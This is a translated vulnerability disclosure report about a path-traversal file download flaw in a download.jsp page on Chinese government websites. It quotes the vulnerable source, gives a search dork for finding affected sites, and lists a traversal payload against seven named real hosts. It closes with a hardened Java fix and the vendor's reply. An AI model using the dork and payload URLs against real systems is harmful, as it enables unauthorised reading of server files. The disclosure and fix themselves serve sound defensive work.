Arbitrary file download in a widely deployed government web system

Vulnerability details

Disclosure status:

2014-02-19: Details sent to the vendor, awaiting vendor handling
2014-02-24: Vendor confirmed; details visible to the vendor only
2014-02-27: Details opened to third-party security partners
2014-03-06: Details opened to core white hats and relevant domain experts
2014-03-16: Details opened to regular white hats
2014-04-05: Details opened to intern white hats
2014-05-20: Details made public

Brief description:

Arbitrary file download

Detailed description:

1. The vulnerability is in download.jsp

Source analysis:

<%@page language="java" contentType="application/x-msdownload" import="java.io.*,java.net.*" pageEncoding="gb2312"%><%
String temp=request.getParameter("path");
if(temp.indexOf("UserFiles")==-1){ // only checks whether the string "UserFiles" appears anywhere in the parameter; "UserFiles/../x" passes
    out.println("非法下载路径!");
    return;
}
String path=temp;//new String(temp.getBytes("8859_1"),"gb2312"); // temp is assigned to path with no sanitisation and then used for the file read below
response.reset();
response.setContentType("application/x-download");
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());
filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8");
response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;
try
{
    output = response.getOutputStream();
    // web root + user-controlled path; ".." segments are not removed, so the result can point anywhere on disk
    filenamedownload=request.getSession().getServletContext().getRealPath("/")+filenamedownload;
    System.out.println("filenamedownload:"+filenamedownload);
    File file=new File(filenamedownload);
    if (!file.exists()){
        out.println("对不起,文件已删除");
        return;
    }
    fis = new FileInputStream(filenamedownload); // and here the unchecked path is opened and streamed back: this is the bug

    byte[] b = new byte[1024];
    int i = 0;
    while((i = fis.read(b)) > 0)
    {
        output.write(b, 0, i);
    }
    output.flush();
}
………………
%>

Some versions look like this:

// st: the requested path split into segments (its definition is not part of the excerpt)
if(st != null && st.length > 0){
    if(!"UserFiles".equals(st[0])){ // only the first segment is compared, so "UserFiles/../x" still passes
        out.println("文件不存在");
        return;
    }
}
if(temp==null)
    temp="";
String path=new String(temp.getBytes("8859_1"),"gb2312");
response.reset();
String filenamedownload = path;
String filenamedisplay = path.substring(path.lastIndexOf("/")+1,path.length());//"System Solution.doc";//System Solution.txt
filenamedisplay = URLEncoder.encode(filenamedisplay,"UTF-8");
response.addHeader("Content-Disposition","attachment;filename=" + filenamedisplay);
OutputStream output = null;
FileInputStream fis = null;

Essentially the same thing: neither version normalises the path before opening it.

2. Google dork:

Let's check how widespread it is:

site:gov.cn inurl:download.jsp?path=/UserFiles/

About 2,590 results

[screenshot: downloadtest.jpg]

3. Testing on one of the sites:

jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp

[screenshot: downloadtest2.jpg]

[screenshot: downloadtest3.jpg]

4. Sites provided for verification and to show that the issue is generic:

jjcx.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
crj.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp
qz.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
www.fjhi.gov.cn/site/quanzhou/bin//download.jsp?path=UserFiles/../download.jsp
fz.fjhi.gov.cn/site/fuzhou/bin//download.jsp?path=UserFiles/../download.jsp
xxgk.fjgat.gov.cn/download.jsp?path=UserFiles/../download.jsp

Proof of vulnerability (the same screenshots and site list as in sections 3 and 4 above):


Fix:

Please notify them to fix it.
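A hardened replacement for the path check, as an added example (Java; not code from the page or from the affected system): the requested value is resolved against the web root, canonicalised, and served only if the real file lies inside UserFiles, so the substring test that lets "UserFiles/../download.jsp" through is replaced by a containment check. In the JSP, webRoot would come from getServletContext().getRealPath("/") and the returned Path would replace filenamedownload; the temporary directory layout in main is constructed for the demo.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class SafeDownload {

    /**
     * Resolve a user-supplied download path against the web root and return the
     * canonical file only if it lies inside the UserFiles upload directory.
     * Replaces indexOf("UserFiles") with a containment check on the canonical path.
     */
    public static Path resolveUserFile(Path webRoot, String requested) throws IOException {
        if (requested == null || requested.isEmpty() || requested.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("illegal download path");
        }
        Path root = webRoot.toRealPath();             // canonical web root
        Path uploadRoot = root.resolve("UserFiles");  // the only permitted subtree
        // The page expects values like "/UserFiles/x.doc"; strip leading slashes so the
        // value is always resolved relative to the web root, never as an absolute path.
        String rel = requested.replaceFirst("^[/\\\\]+", "");
        Path candidate = root.resolve(rel).normalize(); // collapses "../" segments
        if (!candidate.startsWith(uploadRoot)) {
            throw new SecurityException("path escapes UserFiles: " + requested);
        }
        // toRealPath() follows symlinks and fails if the file does not exist; re-check
        // containment so a link placed inside UserFiles cannot point outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(uploadRoot) || !Files.isRegularFile(real)) {
            throw new SecurityException("path escapes UserFiles: " + requested);
        }
        return real;
    }

    // Demo on a constructed layout: a web root holding download.jsp and UserFiles/report.doc.
    public static void main(String[] args) throws IOException {
        Path webRoot = Files.createTempDirectory("webroot");
        Files.createDirectories(webRoot.resolve("UserFiles"));
        Files.write(webRoot.resolve("download.jsp"), "<%-- jsp --%>".getBytes());
        Files.write(webRoot.resolve("UserFiles/report.doc"), "hello".getBytes());

        System.out.println("ok: " + resolveUserFile(webRoot, "/UserFiles/report.doc"));
        try {
            resolveUserFile(webRoot, "UserFiles/../download.jsp"); // the traversal value from the page
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Path.startsWith compares whole path components, so a sibling directory such as UserFiles2 is also rejected.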

Copyright notice: please credit the source when reposting: magerx@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 18

Confirmed: 2014-02-24 09:18

Vendor reply:

The file inclusion caused by the described download page is fairly common. Based on spot checks of further instances, we cannot yet determine whether the 2,590 results belong to the same CMS or the same developer (code shared between parts of the functionality is also quite common). The Fujian province website cases involved have been handed to CNCERT for forwarding to the Fujian branch centre for handling (white hats had already reported two or three cases before this).

Latest status:

None yet


Vulnerability rating: